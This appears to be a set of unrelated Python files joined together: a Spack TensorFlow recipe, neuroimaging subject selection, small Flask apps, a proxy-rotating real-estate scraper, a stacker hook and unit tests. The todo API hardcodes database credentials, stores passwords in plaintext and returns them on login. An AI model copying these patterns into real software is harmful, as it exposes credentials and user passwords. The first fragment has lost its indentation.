#HUD
display.UpdateParam1('open: ' + str(len(pSystem.pipes)))
#display.UpdateParam2('y: ' + str(ball.pos.Y))
#display.UpdateParam3('z: ' + str(ball.pos.Z))
display.UpdateScaleBar()
################################
sc.doc.Views.Redraw()
display.Update(i)
anim.AddFrame(numberOfPasses = numPasses)
################################
#Framerate
frameTime = time.time() - start_time
timeLeft = (numFrames - i) * frameTime
timeLeftStr = str(datetime.timedelta(seconds=timeLeft))
print "Time remaining: {}".format(timeLeftStr)
frameTime = time.time() - init_time
timeLeftStr = str(datetime.timedelta(seconds=frameTime))
print "Total Time: {}".format(timeLeftStr)
if int(skNum) > int(os.path.splitext(os.path.basename(__file__))[0]):
print "!!!!SAVE THE SKETCH WITH A NEW NAME!!!!"
if os.path.isdir(r"D:\Files\Work\LIBRARY\06_RHINO\10_Python\300 DAYS\anim"):
anim.Create(r"D:\Files\Work\LIBRARY\06_RHINO\10_Python\300 DAYS\anim", frames2Keep = [i/2, i-1])
else:
anim.Create(r"C:\Tim\300 Days\anim", frames2Keep = [i/2, i-1])
if __name__ == "__main__":
main()
|
##############################################################################
# Copyright (c) 2013-2016, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the LICENSE file for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
from llnl.util.filesystem import *
import os
import tarfile
def relinstall(f, target):
    """Install regular file *f* under *target*, preserving its relative directory."""
    # Skip anything that is not a plain file (directories, symlinks).
    if not os.path.isfile(f) or os.path.islink(f):
        return
    reldir = os.path.relpath(os.path.dirname(f))
    dest = '%s/%s' % (target, reldir)
    mkdirp(dest)
    install(f, dest)
class TensorflowCms(Package):
    """
    TensorFlow is an open source software library for numerical computation using data flow graphs
    """
    homepage = "https://www.tensorflow.org/"
    # CMS fork of TensorFlow pinned to an exact commit for reproducible builds.
    version('1.6.0', git='https://github.com/cms-externals/tensorflow.git',
            commit='6eea62c87173ad98c71f10ff2f796f6654f5b604')
    # Build-time tools.
    depends_on('bazel@0.11.0', type='build')
    depends_on('swig', type='build')
    depends_on('python', type='build')
    # Python packaging dependencies for the pip wheel built below.
    depends_on('py-numpy')
    depends_on('py-wheel')
    depends_on('py-pip')
    # Spack-provided sources substituted into TF's vendored dependencies in install().
    depends_on('eigen')
    depends_on('protobuf')
    # NOTE(review): presumably renames TF runtime targets for the CMS build -
    # confirm against the patch file itself.
    patch('tensorflow-1.6.0-rename-runtime.patch')
    def setup_environment(self, spack_env, run_env):
        """Pre-answer TensorFlow's interactive ./configure via environment variables.

        Every optional backend (cloud storage, CUDA/OpenCL, MKL, MPI, XLA,
        Android, ...) is switched off, yielding a plain CPU-only build.
        """
        spack_env.set('TF_NEED_S3', '0')
        spack_env.set('TF_NEED_GCP', '0')
        spack_env.set('TF_NEED_HDFS', '0')
        spack_env.set('TF_NEED_JEMALLOC','0')
        spack_env.set('TF_NEED_KAFKA', '0')
        spack_env.set('TF_NEED_OPENCL_SYCL', '0')
        spack_env.set('TF_NEED_COMPUTECPP', '0')
        spack_env.set('TF_NEED_OPENCL', '0')
        spack_env.set('TF_CUDA_CLANG', '0')
        spack_env.set('TF_NEED_TENSORRT', '0')
        spack_env.set('TF_ENABLE_XLA', '0')
        spack_env.set('TF_NEED_GDR', '0')
        spack_env.set('TF_NEED_VERBS', '0')
        spack_env.set('TF_NEED_CUDA', '0')
        spack_env.set('TF_NEED_MKL', '0')
        spack_env.set('TF_NEED_MPI', '0')
        spack_env.set('TF_SET_ANDROID_WORKSPACE', '0')
        # Conservative target architecture and C++11.
        spack_env.set('CC_OPT_FLAGS', '-march=core2')
        spack_env.set('CXX_OPT_FLAGS', '-std=c++11')
        spack_env.set('USE_DEFAULT_PYTHON_LIB_PATH', '1')
        spack_env.set('PYTHON_BIN_PATH', '%s/python' % self.spec['python'].prefix.bin )
        # pip --user installs below land inside the Spack prefix.
        spack_env.set('PYTHONUSERBASE', '%s' % self.spec.prefix)
    def install(self, spec, prefix):
        """Configure, build with bazel, then install C++ libraries, headers,
        AOT tools and the pip wheel into the prefix."""
        # Keep bazel's output trees inside the Spack stage directory.
        base='--output_base=%s/base'%self.stage.path
        user_root='--output_user_root=%s/user_root'%self.stage.path
        filename=join_path(self.stage.path,'tensorflow','.bazelrc')
        with open(filename,'w') as f:
            f.write('startup '+base+' '+user_root+'\n')
        configure()
        # Substitute Spack-provided eigen/protobuf sources for TF's download URLs.
        for f in ['tensorflow/workspace.bzl','tensorflow/contrib/makefile/download_dependencies.sh']:
            filter_file('@EIGEN_SOURCE@', env['EIGEN_SOURCE'],f)
            filter_file('@EIGEN_STRIP_PREFIX@', env['EIGEN_STRIP_PREFIX'],f)
            filter_file('@PROTOBUF_SOURCE@', env['PROTOBUF_SOURCE'],f)
            filter_file('@PROTOBUF_STRIP_PREFIX@', env['PROTOBUF_STRIP_PREFIX'], f)
        bazel=which('bazel')
        bazel('fetch', 'tensorflow:libtensorflow_cc.so')
        # Patch fetched build files: propagate the shell environment to the
        # swig and protoc actions, and link protobuf against librt.
        for f in find(self.stage.path,'base/external/org_tensorflow/tensorflow/tensorflow.bzl'):
            filter_file('executable=ctx.executable._swig,','env=ctx.configuration.default_shell_env, executable=ctx.executable._swig,',f)
        for f in find(self.stage.path, 'base/external/protobuf_archive/protobuf.bzl'):
            filter_file('mnemonic="ProtoCompile",','env=ctx.configuration.default_shell_env, mnemonic="ProtoCompile",', f)
        for f in find(self.stage.path,'base/external/protobuf/BUILD'):
            filter_file('"-lpthread", "-lm"','"-lpthread", "-lm", "-lrt"', f)
        # Build every artifact installed below (C++ lib, pip package, AOT tooling).
        bazel('build', '-s', '--verbose_failures', '-c', 'opt', '--cxxopt=%s' % env['CXX_OPT_FLAGS'],
              '//tensorflow:libtensorflow_cc.so')
        bazel('build', '-s', '--verbose_failures', '-c', 'opt', '--cxxopt=%s' % env['CXX_OPT_FLAGS'],
              '//tensorflow/tools/pip_package:build_pip_package')
        bazel('build', '-s', '--verbose_failures', '-c', 'opt', '--cxxopt=%s' % env['CXX_OPT_FLAGS'],
              '//tensorflow/tools/lib_package:libtensorflow')
        bazel('build', '-s', '--verbose_failures', '-c', 'opt', '--cxxopt=%s' % env['CXX_OPT_FLAGS'],
              '//tensorflow/python/tools:tools_pip')
        bazel('build', '-s', '--verbose_failures', '-c', 'opt', '--cxxopt=%s' % env['CXX_OPT_FLAGS'],
              '//tensorflow/tools/graph_transforms:transform_graph')
        bazel('build', '-s', '--verbose_failures', '-c', 'opt', '--cxxopt=%s' % env['CXX_OPT_FLAGS'],
              '//tensorflow/compiler/aot:tf_aot_runtime')
        bazel('build', '-s', '--verbose_failures', '-c', 'opt', '--cxxopt=%s' % env['CXX_OPT_FLAGS'],
              '//tensorflow/compiler/tf2xla:xla_compiled_cpu_function')
        bazel('build', '-s', '--verbose_failures', '-c', 'opt', '--cxxopt=%s' % env['CXX_OPT_FLAGS'],
              '//tensorflow/compiler/aot:tfcompile')
        bazel('shutdown')
        build_pip_package=Executable('bazel-bin/tensorflow/tools/pip_package/build_pip_package')
        build_pip_package('.')
        # Staging layout mirroring the final prefix (lib/bin/include).
        libdir='%s/tensorflow_cc/lib' % os.getcwd()
        bindir='%s/tensorflow_cc/bin' % os.getcwd()
        incdir='%s/tensorflow_cc/include' % os.getcwd()
        mkdirp(libdir)
        mkdirp(bindir)
        mkdirp(incdir)
        # Copy real files only, skipping bazel's symlinks.
        for f in find('bazel-bin/tensorflow/','libtensorflow_cc.so'):
            if os.path.isfile(f) and not os.path.islink(f):
                install(f, libdir)
        for f in find('bazel-bin/tensorflow/','libtensorflow_framework.so'):
            if os.path.isfile(f) and not os.path.islink(f):
                install(f, libdir)
        for f in find('bazel-bin/tensorflow/compiler/aot','libtf_aot_runtime.so'):
            if os.path.isfile(f) and not os.path.islink(f):
                install(f, libdir)
        for f in find('bazel-bin/tensorflow/compiler/tf2xla', 'libxla_compiled_cpu_function.so'):
            if os.path.isfile(f) and not os.path.islink(f):
                install(f, libdir)
        for f in find('bazel-bin/tensorflow/compiler/aot','tfcompile'):
            if os.path.isfile(f) and not os.path.islink(f):
                install(f, bindir)
        # Fetch header-only third-party deps, then install headers preserving
        # their relative paths (relinstall).
        depdl=Executable('tensorflow/contrib/makefile/download_dependencies.sh')
        depdl()
        for d in ('tensorflow','third_party'):
            for f in find( d, '*.h'):
                relinstall(f, incdir)
        for f in find('third_party/eigen3','*'):
            relinstall(f, incdir)
        # Generated headers (excluding contrib).
        with working_dir('./bazel-genfiles'):
            for f in find('tensorflow','*.h'):
                if str(f).find('contrib') == -1:
                    relinstall(f, incdir)
        with working_dir('./tensorflow/contrib/makefile/downloads'):
            for d in ('gemmlowp', 'googletest', 're2', 'nsync/public'):
                for f in find( d,'*.h'):
                    relinstall(f, incdir)
            for d in ('eigen/Eigen', 'eigen/unsupported'):
                for f in find( d,'*'):
                    relinstall(f, incdir)
            f='eigen/signature_of_eigen3_matrix_library'
            if os.path.exists(f):
                relinstall(f, incdir)
        # The lib_package tarball carries the C API headers/libs; unpack into staging.
        tar=tarfile.open('bazel-bin/tensorflow/tools/lib_package/libtensorflow.tar.gz')
        tar.extractall('tensorflow_cc')
        install_tree(incdir, prefix.include)
        install_tree(libdir, prefix.lib)
        install_tree(bindir, prefix.bin)
        # Install the freshly built wheel; --user honors PYTHONUSERBASE=prefix.
        pip=which('pip')
        for f in find('.', 'tensorflow*.whl'):
            pip('install', '--user', '-v', f)
|
# This script selects the subjects and returns the dataframe of the selected participants based on certain criteria:
import pandas as pd
import numpy as np
from os.path import join as opj
def extract(phenotype_file_path, base_directory, criteria_dict):
    """Select participants whose phenotype row matches every criterion.

    Parameters
    ----------
    phenotype_file_path : str
        CSV file with one row per participant.
    base_directory : str
        Directory whose ``log.txt`` is appended with the applied criteria.
    criteria_dict : dict
        Mapping of column name -> required value; the filters are ANDed.

    Returns
    -------
    pandas.DataFrame
        The rows satisfying all criteria.
    """
    df_phenotype = pd.read_csv(phenotype_file_path)
    log_path = opj(base_directory,"log.txt")
    # The log file was previously opened and never closed (handle leak);
    # a context manager guarantees flush-and-close.
    with open(log_path, 'a') as log:
        log.write("------------- Extracted the subjects using the following criterias -------------\n")
        for criteria, value in criteria_dict.items():
            df_phenotype = df_phenotype.loc[df_phenotype[criteria] == value]
            log.write('%s == %s \n'%(criteria, value))
    return df_phenotype
def extract_with_manual_query(phenotype_file_path, base_directory):
    """Return ``(df_healthy, df_diseased)`` subsets of the phenotype table.

    df_healthy:  SEX == 1 and DX_GROUP == 2 and EYE_STATUS_AT_SCAN == 1
    df_diseased: SEX == 1 and DSM_IV_TR == 1 and EYE_STATUS_AT_SCAN == 1
    Rows are sorted by SUB_ID; the query is also appended to log.txt.
    """
    df_phenotype = pd.read_csv(phenotype_file_path)
    df_phenotype = df_phenotype.sort_values(['SUB_ID'])
    df_healthy = df_phenotype.loc[(df_phenotype['SEX'] == 1) & (df_phenotype['DX_GROUP'] == 2) \
                                  & (df_phenotype['EYE_STATUS_AT_SCAN'] == 1)]
    df_diseased = df_phenotype.loc[(df_phenotype['SEX'] == 1) & (df_phenotype['DSM_IV_TR'] == 1) \
                                   & (df_phenotype['EYE_STATUS_AT_SCAN'] == 1)]
    log_path = opj(base_directory,"log.txt")
    # Context manager fixes the leaked file handle of the original version.
    with open(log_path, 'a') as log:
        log.write("------------- Extracted the subjects using the following criterias -------------\n")
        log.write("df_healthy = df_phenotype.loc[(df_phenotype['SEX'] == 1) & (df_phenotype['DX_GROUP'] == 2) \
    & (df_phenotype['EYE_STATUS_AT_SCAN'] == 1) ]\n")
    return df_healthy , df_diseased
if __name__ == "__main__":
    phenotype_file_path = '/home1/varunk/data/ABIDE1/RawDataBIDs/composite_phenotypic_file.csv'
    base_directory = ''
    criteria_dict = {'SEX' : 1,'DX_GROUP' : 2, 'EYE_STATUS_AT_SCAN' : 1}
    df_healthy = extract(phenotype_file_path, base_directory, criteria_dict)
    print(df_healthy)
    df_healthy.to_csv('healthy.csv')
    # BUGFIX: the second result was saved via an undefined name `df`
    # (NameError at runtime); save the returned healthy frame instead.
    df_healthy2, df_diseased = extract_with_manual_query(phenotype_file_path, base_directory)
    df_healthy2.to_csv('healthy2.csv')
|
from flask import Flask
import requests
app = Flask(__name__)
countOfLikes = 0
countOfDislikes = 0
@app.route("/")
def index():
    """Render the current like/dislike counters as a small HTML fragment."""
    likes_line = "Количество ❤: " + str(countOfLikes)
    dislikes_line = "Количество 💔: " + str(countOfDislikes)
    return likes_line + "<br>" + dislikes_line
@app.route("/like")
def like():
    """Increment the global like counter."""
    global countOfLikes
    countOfLikes += 1
    return "like"
@app.route("/dislike")
def dislike():
    """Increment the global dislike counter."""
    global countOfDislikes
    countOfDislikes += 1
    return "dislike"
@app.route("/mark")
def helloMark():
    """Return a static greeting."""
    return "Hello Mark!"
@app.route("/joke")
def getJoke():
    """Fetch a random Chuck Norris joke and render it with its icon."""
    payload = requests.get("https://api.chucknorris.io/jokes/random").json()
    return '<img src="' + payload['icon_url'] + '" ><p>' + payload['value'] + '</p>'
if __name__ == "__main__":
    # BUGFIX: removed a stray trailing "|" that made this line a syntax error.
    # NOTE(review): binds to a specific LAN address - confirm the host is intended.
    app.run(host='192.168.1.178', port=4567)
from selenium import webdriver
# chrome_path = r"C:\Users\Ruben\Documents\Python packages\chromedriver_win32\chromedriver.exe"
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.proxy import Proxy, ProxyType
from selenium.webdriver.firefox.options import Options
from bs4 import BeautifulSoup
from fake_useragent import UserAgent
import random
import requests
import traceback
import time
import re
import datetime
from scraper.functionScraper import *
from scraper.classListingObject import *
from scraper.classHelpClasses import *
from scraper.classDBOperations import *
# THIS CODE ITERATES THROUGH POSTAL CODES AND GETS URLS OF LISTINGS, STORES THEM IN A DATABASE
def scraper1():
    """Iterate over postal codes on comparis.ch and store listing URLs in the DB.

    For each postal code: pick a working free proxy, search comparis.ch with a
    headless Firefox, walk the result pagination, scrape listing URLs with
    BeautifulSoup, deduplicate against the UrlList table, and record the date.
    """
    pstlCodes = postalCodes(DBOperations("kezenihi_srmidb3"))
    uncheckedPostal = True
    while uncheckedPostal is True:
        # GET POSTALCODE
        postalCodesList = pstlCodes.getAllPostalCodes()
        postalCodesList = random.sample(postalCodesList, 10)
        pc = postalCodesList[0]
        # ITERATE THROUGH POSTAL CODES
        if (len(postalCodesList) == 0):
            uncheckedPostal = False
        else:
            pstlCodes.markInProgress(1, postalCodesList)
            for pc in postalCodesList:
                try:
                    print("SCRAPING FOR POSTAL CODE:")
                    print(pc)
                    # GET PROXY LIST, NEEDED TO CHANGE PROXY FROM TIME TO TIME
                    proxies = get_proxies()
                    # GET FAKE BROWSER USER AGENTS, CHANGED TOGETHER WITH PROXY
                    ua = UserAgent()
                    headers = ua.random
                    # TEST PROXY
                    url = 'https://httpbin.org/ip'
                    proxyWorks = False
                    print("GETTING PROXY")
                    while proxyWorks is False:
                        global proxy
                        print("Request")
                        proxy = random.choice(proxies)
                        try:
                            print("TRY")
                            response = requests.get(url, proxies={"http": proxy, "https": proxy})
                            proxyWorks = True
                            print(response.json())
                        except:
                            # Most free proxies will often get connection errors. You will have retry the entire request using another proxy to work.
                            # We will just skip retries as its beyond the scope of this tutorial and we are only downloading a single url
                            print("Skipping. Connnection error")
                    # SET PROXY FOR BEAUTIFULSOUP
                    proxies = {
                        "http": proxy,
                        "https": proxy,
                    }
                    # SET PROXY FOR SELENIUM
                    proxy = Proxy({
                        'proxyType': ProxyType.MANUAL,
                        'httpProxy': proxy,
                        'ftpProxy': proxy,
                        'sslProxy': proxy,
                        'noProxy': '' # set this value as desired
                    })
                    # MAKE BROWSER HEADLESS
                    options = Options()
                    options.headless = True
                    # MAKE BROWSER HEADLESS
                    # chrome_options = webdriver.ChromeOptions()
                    # chrome_options.add_argument('--headless')
                    # chrome_options.add_argument('--proxy-server={}'.format(proxy))
                    # OPEN HEADLESS BROWSER WINDOW AND VISIT INITIAL SEARCH PAGE OF COMPARIS
                    driver = webdriver.Firefox(options=options, proxy=proxy, service_log_path='/dev/null')
                    driver.get("https://www.comparis.ch/immobilien/result")
                    # TYPE IN POSTAL CODE AND HIT ENTER
                    siteReached = False
                    try:
                        searchField = driver.find_element_by_id("SearchParams_LocationSearchString")
                        siteReached = True
                    except:
                        print("Site could not be reached")
                    if (siteReached is True):
                        searchField.send_keys(str(pc))
                        searchField.send_keys(Keys.ENTER)
                        # WAIT 5 SECONDS AND GET CURRENT URL
                        time.sleep(5)
                        initialUrl = driver.current_url
                        # FIND OUT HOW MANY PAGES THERE ARE
                        nrOfPages = None
                        try:
                            nrOfPages = int(driver.find_element_by_css_selector("ul.pagination li:nth-last-child(2) a").get_attribute("innerHTML"))
                            print("Number of Pages: "+str(nrOfPages))
                        except Exception as e:
                            print("No pages found")
                            print(e)
                        # IF NO PAGES ARE EXISTING ONLY SCRAPE THE URLS FROM THE INITIAL PAGE
                        if (nrOfPages is not None):
                            # PRESS PAGINATION NEXT BUTTON (NECESSARY TO GET THE SECOND PAGE URL, WHICH CAN BE USED TO GENERATE ALL REMAINING URLS)
                            nextButton = driver.find_element_by_css_selector('.pagination-next a')
                            nextButton.click()
                            # GET URL OF SECOND PAGE
                            time.sleep(5)
                            secondUrl = driver.current_url
                            # CREATE ALL REMAINING URLS
                            allUrls = [initialUrl, secondUrl]
                            plainUrl = re.sub('&page=1', '', secondUrl)
                            for i in range(2, nrOfPages):
                                allUrls.append(plainUrl+"&page="+str(i))
                        else:
                            allUrls = [initialUrl] # IF NO PAGINATION EXISTING
                        # CLOSE HEADLESS BROWSER WINDOW
                        driver.close()
                        driver.quit()
                        # GET URLS OF LISTINGS
                        urlListings = []
                        checkSuccess = False
                        # SET COUNTER FOR CONSOLE OUTPUT
                        counter = 1
                        # ITERATE THROUGH ALL URLS AND SCRAPE LISTING URLS FROM THERE
                        for i in allUrls:
                            # VISIT URL, GET SOURCE CODE
                            try:
                                page = None
                                print("Scrape listing URLs for Base URL: "+str(counter))
                                page = requests.get(i, proxies=proxies, headers={'user-agent': headers}, timeout=60).content # connect to website
                            except:
                                print("An error occured.")
                            # IF REQUEST WAS SUCCESSFUL SCRAPE THROUGH SOURCE CODE
                            if(page is not None):
                                soup = BeautifulSoup(page, 'html.parser')
                                d = datetime.datetime.today()
                                # SET VAR TO TRUE TO INDICATE THAT THIS POSTAL CODE CAN BE MARKED AS SCRAPED WITH A CURRENT DATE
                                checkSuccess = True
                                print("Check was successful")
                                # ITERATE THROUGH DIVS CONTAINING THE ADDRESS, POSTAL CODE AND URL
                                # WE SCRAPE THE POSTAL CODE INITIALLY HERE, BECAUSE IT CAN BE EASIER DISTINGUISHED BETWEEN STREET AND POSTAL CODE
                                for a in soup.select('div.content-column.columns'):
                                    if (len(a.select('a.title')) > 0):
                                        url = a.select('a.title')[0]['href']
                                        print("--> Found URL: "+url)
                                    if (len(a.select('span.street')) > 0):
                                        street = a.select('span.street')[0].string
                                    else:
                                        street = 0
                                    if (len(a.select('address')) > 0):
                                        postal = str(a.select('address')[0].text).strip()
                                        postal = re.findall("\d{4}", postal)
                                        postal = postal[0]
                                    else:
                                        postal = 0
                                    # APPEND FOUND URLS TO LIST UF URLS
                                    urlListings.append(("https://en.comparis.ch"+url, street, postal, 0, d.strftime('%Y-%m-%d'), 0))
                                counter = counter+1
                                print("Appended, length of URL list: "+str(len(urlListings)))
                        # CHECK WHETHER URLS ARE IN UrlList already
                        checkedUrls = UrlList(DBOperations("kezenihi_srmidb3"))
                        allCheckedUrls = checkedUrls.getAllUrls()
                        # REMOVE DOUBE ENTRIES
                        validUrls = [x for x in urlListings if x[0] not in allCheckedUrls]
                        # IF VALID URLS ARE REMAINING, INSERT THEM INTO listingURL
                        if (len(validUrls) > 0):
                            # INSERT NEW URLS INTO listingURL
                            print("Update listingURL table")
                            checkedUrls.insertNewUrls(validUrls)
                        else:
                            print("No new URLS added")
                        # UPDATE postalCodes TABLE WITH NEW DATE
                        if (checkSuccess is True):
                            print("Update postalCodes table")
                            d = datetime.datetime.today()
                            # BUGFIX: was `postalCodes.updateLastChecked(...)`, which called
                            # the class unbound; use the `pstlCodes` instance created above.
                            pstlCodes.updateLastChecked(postalCode=pc, date=d.strftime('%Y-%m-%d'))
                        print("\n\n")
                except Exception as e:
                    print("THIS POSTAL CODE DID NOT RUN THROUGH")
                    print(traceback.format_exc())
                    print(e)
                    print("\n\n")
    pstlCodes.markInProgress(0, postalCodesList)
|
"""Wrapper for keypair hook adding support for values from environment."""
import logging
from stacker.lookups.handlers.default import handler as default_handler
from stacker.lookups.handlers.output import handler as output_handler
import stacker.hooks.keypair as keypair
LOGGER = logging.getLogger(__name__)
def ensure_keypair_exists(provider, context, **kwargs):
    """Wrap ensure_keypair_exists with support for environment values.

    Resolution order for the keypair name:
      1. ``keypair`` - explicit name, passed straight through.
      2. ``keypair_from_output_handler`` - resolved via the output lookup.
      3. ``keypair_name_from_default_handler`` - resolved via the default
         lookup (``"env_var::fallback"``); creation is skipped when it
         resolves to an empty/undefined value.

    Returns the wrapped hook's result, True when creation is skipped, or
    False on invalid arguments.
    """
    if kwargs.get('keypair'):
        # keypair has been explicitly set; nothing to do here
        return keypair.ensure_keypair_exists(context=context,
                                             provider=provider,
                                             **kwargs)
    elif kwargs.get('keypair_from_output_handler'):
        keypair_name = output_handler(
            kwargs.get('keypair_from_output_handler'),
            provider=provider,
            context=context
        )
        return keypair.ensure_keypair_exists(context=context,
                                             provider=provider,
                                             keypair=keypair_name)
    elif kwargs.get('keypair_name_from_default_handler'):
        if '::' not in kwargs.get('keypair_name_from_default_handler'):
            LOGGER.error('Invalid value provided for '
                         'keypair_name_from_default_handler - need value in '
                         'the form of "env_var::fallback", received "%s".',
                         kwargs.get('keypair_name_from_default_handler'))
            return False
        keypair_name = default_handler(
            kwargs.get('keypair_name_from_default_handler'),
            provider=provider,
            context=context
        )
        # Treat empty / quoted-empty / "undefined" env values as "no keypair wanted".
        if keypair_name in [None, '', '\'', '\'\'', 'undefined']:
            LOGGER.info(
                'Skipping keypair creation; default handler found no '
                'environment value matching "%s"...',
                kwargs.get('keypair_name_from_default_handler').split('::')[0])
            return True
        return keypair.ensure_keypair_exists(context=context,
                                             provider=provider,
                                             keypair=keypair_name)
    else:
        # BUGFIX: kwargs.iteritems() is Python-2-only; items() works on both.
        kwargs_string = ', '.join(
            "%s=%r" % (key, val) for (key, val) in kwargs.items()
        )
        # BUGFIX: the message previously named kwargs that do not exist
        # ("keypair_from_output", "keypair_from_default").
        LOGGER.error('No valid argument provided to ensure_keypair_exists ('
                     'looking for one of keypair, keypair_from_output_handler, '
                     'or keypair_name_from_default_handler - received "%s")',
                     kwargs_string)
        return False
|
from flask import Flask,render_template, jsonify,make_response,redirect
from flask.globals import request
from flask import abort
from flask_pymongo import PyMongo
from bson.json_util import dumps
import pymongo
import datetime as dt
app = Flask(__name__)
app.config['MONGO_DBNAME']='my_todo_list'
app.config['MONGO_URI']="mongodb://awais:awais64@ds121652.mlab.com:21652/my_todo_list"
mongo = PyMongo(app)
c = pymongo.MongoClient()
#Global Var
login = False
loginCred = []
'''
Signup
'''
@app.route('/todo/signup',methods=['POST'])
def Signup():
    """Register a new user from the JSON body unless the username exists."""
    users = mongo.db.users
    if not request.json:
        abort(404)
    content = request.get_json()
    auth = {
        "id":users.count()+1,
        "name":content.get('name'),
        "username": content.get('username'),
        "password": content.get('password')
    }
    # BUGFIX: `users.find(...) == None` was always False because find()
    # returns a Cursor, never None; find_one() returns None when no match.
    if users.find_one({"username":auth["username"]}) is None:
        users.insert(auth)
        return auth['name']+" is Successfully Added"
    else:
        return "already exist"
'''
@app.route('/todo/api/v1.0/tasks/<int:task_id>')
def get_by_value(task_id):
task = [task for task in tasks if task['id']==task_id]
if len(task)==0:
abort(404)
return jsonify({'tasks':task})
'''
@app.route('/todo/login',methods=['POST'])
def Login():
    """Validate username/password from the JSON body and return the matches.

    NOTE(review): assigns the module-level-named `login`/`loginCred` without a
    `global` statement, so only locals are set - preserved as-is to avoid a
    behavior change; confirm whether module state was intended.
    """
    loginCred=[]
    login = False
    users = mongo.db.users
    if not request.json:
        abort(404)
    content = request.get_json()
    auth = {
        "username": content.get('username'),
        "password": content.get('password')
    }
    # BUGFIX: a Cursor never compares equal to []/{} and is not falsy, so the
    # old "not correct" branch was unreachable; materialize the cursor instead.
    rec = list(users.find({"username":auth["username"],"password":auth["password"]}))
    if not rec:
        return "username or password not correct"
    else:
        login = True
        loginCred.append([{'id':i['id'],'username':i['username'],'password':i['password'],'name':i['name']} for i in rec])
        return jsonify({'users':loginCred})
@app.route('/todo/api/v1.0/tasks',methods=['POST'])
def addtask():
    """Create a task for user 1 from the JSON body and return the full task list."""
    # Login check disabled in the original:
    # if login == False: return "Login to add task"
    user_id = 1
    todo = mongo.db.todo
    if not request.json:
        abort(404)
    content = request.get_json()
    existing = sum(1 for _ in todo.find({'userid': user_id}))
    send = {
        "taskid": existing + 1,
        "userid": user_id,
        "title": content.get('title'),
        "note": content.get('note'),
        "setdate": dt.datetime.now(),
        "duedate": content.get('duedate'),
        "done": False
    }
    todo.insert(send)
    tasks = [{"taskid": i['taskid'], "userid": user_id, "title": i['title'], "note": i["note"], "setdate": i["setdate"], "duedate": i['duedate']} for i in todo.find({'userid': user_id})]
    return jsonify([tasks])
@app.route('/todo/api/v1.0/tasks')
def getAllTask():
    """Return every task belonging to user 1."""
    user_id = 1
    todo = mongo.db.todo
    tasks = [{"taskid": i['taskid'], "userid": user_id, "title": i['title'], "note": i["note"], "setdate": i["setdate"], "duedate": i['duedate']} for i in todo.find({'userid': user_id})]
    return jsonify([tasks])
@app.route('/todo/api/v1.0/tasks/<int:tsk>')
def oneTask(tsk):
    """Return user 1's task whose taskid equals *tsk* (empty list when absent)."""
    user_id = 1
    todo = mongo.db.todo
    matches = [{"taskid": i['taskid'], "userid": user_id, "title": i['title'], "note": i["note"], "setdate": i["setdate"], "duedate": i['duedate']} for i in todo.find({'userid': user_id}) if i['taskid'] == tsk]
    return jsonify([matches])
@app.route('/todo/api/v1.0/tasks/<int:tsk>',methods=['PUT'])
def upadteTask(tsk):
    """Update task *tsk* of user 1 with the fields from the JSON body."""
    user_id = 1
    todo = mongo.db.todo
    if not request.json:
        abort(404)
    todo.update({'userid': user_id, 'taskid': tsk}, {'$set': request.get_json()})
    return "Successfully Updated"
@app.route('/todo/api/v1.0/tasks/<int:tsk>',methods=['DELETE'])
def delete(tsk):
    """Delete task *tsk* of user 1."""
    user_id = 1
    todo = mongo.db.todo
    # A JSON body is required (and parsed) even though it is unused, as before.
    if not request.json:
        abort(404)
    content = request.get_json()
    todo.delete_one({'userid': user_id, 'taskid': tsk})
    return "Successfully Deleted"
# BUGFIX: removed a stray trailing "|" that made this line a syntax error.
app.run(debug=True)
import unittest
from katas.kyu_7.strive_matching_2 import match
class StriveMatchingTestCase(unittest.TestCase):
    """Tests for the strive-matching kata's match() function."""

    def setUp(self):
        equity_candidate = {
            'desires_equity': True,
            'current_location': 'New York',
            'desired_locations': ['San Francisco', 'Los Angeles'],
        }
        no_equity_candidate = {
            'desires_equity': False,
            'current_location': 'San Francisco',
            'desired_locations': ['Kentucky', 'New Mexico'],
        }
        self.candidates = [equity_candidate, no_equity_candidate]

    def test_equals(self):
        job = {'equity_max': 0, 'locations': ['Los Angeles', 'New York']}
        self.assertEqual(len(match(job, self.candidates)), 0)

    def test_equals_2(self):
        job = {'equity_max': 1.2, 'locations': ['New York', 'Kentucky']}
        self.assertEqual(len(match(job, self.candidates)), 2)
|
#This code checks whether a string contains only unique characters by storing it in a hash table:
#e.g. s='ABCDE'
#While storing elements in a hash table, the time complexity is O(n),
#but while accessing an element, the complexity is O(1)
def is_String_Unique(s):
    """Print whether *s* contains duplicate characters.

    A set gives the same O(1) average-time membership test as the original
    fixed-size hash table, but works for any character (the old 150-slot
    table raised IndexError for ord(c) >= 150), drops the unused locals, and
    prints via the function form so the code also runs under Python 3.
    """
    seen = set()
    for ch in s:
        if ch in seen:
            # First repeated character found - report and stop scanning.
            print('Duplicate Characters !')
            break
        seen.add(ch)
    else:
        # Loop completed without finding a repeat.
        print("No Duplicate Characters")

is_String_Unique('ABCDFFA')
|
from cuatro.dice import Dice
from cuatro.fields import *
def test_one():
    """Table-driven check of One().fits over rolls with increasing counts of ones."""
    dice = Dice()
    field = One()
    cases = [
        ([2, 2, 2, 3, 4], False),
        ([1, 2, 2, 3, 4], False),
        ([1, 1, 2, 3, 4], True),
        ([1, 1, 1, 3, 4], True),
        ([1, 1, 1, 1, 4], True),
        ([1, 1, 1, 1, 1], True),
    ]
    for roll, expected in cases:
        dice._update(roll)
        assert field.fits(dice) == expected
def test_straight():
    """Table-driven check of Straight().fits for non-straight and straight rolls."""
    dice = Dice()
    field = Straight()
    cases = [
        ([1, 2, 3, 4, 4], False),
        ([1, 2, 3, 4, 5], True),
        ([6, 2, 3, 4, 5], True),
    ]
    for roll, expected in cases:
        dice._update(roll)
        assert field.fits(dice) == expected
|
